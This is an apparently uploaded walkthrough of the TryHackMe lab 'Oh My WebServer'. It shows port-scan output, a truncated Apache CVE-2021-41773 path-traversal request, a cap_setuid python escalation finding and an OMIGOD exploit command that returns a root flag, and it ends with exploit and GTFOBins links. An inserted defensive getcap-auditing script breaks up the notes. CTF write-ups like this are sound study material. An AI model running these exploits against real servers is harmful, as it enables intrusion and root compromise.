Oh_My_WebServer

The document details a security scan of a web server at IP address 10.10.195.101 using RustScan, revealing open ports for SSH and HTTP services. It includes initial access attempts via HTTP TRACE and privilege escalation checks, identifying a Python executable with elevated capabilities. Additionally, it provides references to exploits and tools for further enumeration and exploitation of vulnerabilities found in the server.

Uploaded by

repilex959

Oh My WebServer

Initial Scan
root@ip-10-10-4-90:~# rustscan -a 10.10.195.101 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"


[~] File limit higher than batch size. Can increase speed by increasing batch size
Open 10.10.195.101:22
Open 10.10.195.101:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT STATE SERVICE REASON VERSION


22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; p
80/tcp open http syn-ack Apache httpd 2.4.49 ((Unix))
|_http-favicon: Unknown favicon MD5: 02FD5D10B62C7BC5AD03F8B0F105323C
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)

|_http-title: Consult - Business Consultancy Agency Template | Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

root@ip-10-10-4-90:~# curl -X TRACE -H "X-Header: Attila21" 10.10.195.101
TRACE / HTTP/1.1
Host: 10.10.195.101
User-Agent: curl/7.58.0
Accept: */*
X-Header: Attila21

root@ip-10-10-4-90:~#

curl 'http://10.10.195.101/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%

Privilege Escalation

daemon@4a70924bafa0:/dev/shm$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/python3.7 = cap_setuid+ep
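
A defender's view of the `getcap` finding above, as an added example that is not part of the original notes: a Python parser for `getcap -r` output that flags identity-changing or permission-bypassing file capabilities and rates them critical when they sit on an interpreter. The capability list, the interpreter names and every sample line other than the `python3.7` entry are assumptions made for illustration; the parser accepts both the `path = caps+ep` form shown here and the `path caps=ep` form printed by newer libcap releases.

```python
import os
import re

# Capabilities that let a process change identity or bypass file permission checks.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
             "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search"}
# Programs that execute caller-supplied code: a capability on them is usable by any local user.
INTERPRETER = re.compile(r"^(python|perl|ruby|php|node|lua|tclsh|gdb|bash|dash|sh)[\d.]*$")
# One clause of libcap's text form: [cap,cap...] operator [flags]; an empty list means "all".
CLAUSE = re.compile(r"([a-z0-9_,]*)([=+-])([eip]*)")
# The clause list is whatever follows the path; older getcap puts a bare "=" clause first.
ENTRY = re.compile(r"\s((?:[a-z0-9_,]*[=+-][eip]*(?:\s+|$))+)$")


def audit_getcap(output):
    """Return (path, capabilities, severity) for each risky entry in `getcap -r` output."""
    findings = []
    for line in output.splitlines():
        line = line.strip()
        entry = ENTRY.search(line)
        if not entry or not line.startswith("/"):
            continue  # prompts, echoed commands, blank lines
        path, risky = line[:entry.start()], set()
        for caps, op, flags in CLAUSE.findall(entry.group(1)):
            # Inheritable-only ("i") entries grant nothing by themselves; "-" clauses remove.
            if op == "-" or not set(flags) & {"e", "p"}:
                continue
            names = set(caps.split(",")) if caps else {"ALL"}
            risky |= names & (DANGEROUS | {"ALL"})
        if risky:
            severity = "critical" if INTERPRETER.match(os.path.basename(path)) else "review"
            findings.append((path, sorted(risky), severity))
    return findings


# Constructed sample: the first line is the finding shown above, the rest are invented.
SAMPLE = """\
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
/usr/sbin/backup-agent cap_dac_read_search,cap_chown=ep
/usr/bin/perl5.30 cap_setuid=i
"""

if __name__ == "__main__":
    for path, caps, severity in audit_getcap(SAMPLE):
        print(f"{severity:8} {path}: {','.join(caps)}")
```

Feeding it the output of a scheduled `getcap -r /` run on each host or container image gives a baseline to diff against; an unexpected entry is cleared with `setcap -r <path>`.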

Further Enumeration

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 9134 bytes 2365947 (2.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9683 bytes 10622282 (10.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536


inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

python3 exp.py -t 172.17.0.1 -c 'whoami;pwd;id;hostname;uname -a;cat /root/root


id
root
/var/opt/microsoft/scx/tmp
uid=0(root) gid=0(root) groups=0(root)
ubuntu
Linux ubuntu 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
THM{7f147ef1f36da9ae29529890a1b6011f}

Creds
Services User names Passwords


Exploits links
https://github.com/AlteredSecurity/CVE-2021-38647

python | GTFOBins
The payloads are compatible with both Python version 2 and 3. It can be used to break out from
restricted environments by spawning an interactive system shell. It can send back a reverse shell to a
listening attacker to open a remote network access. Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
https://gtfobins.github.io/gtfobins/python/#capabilities

https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
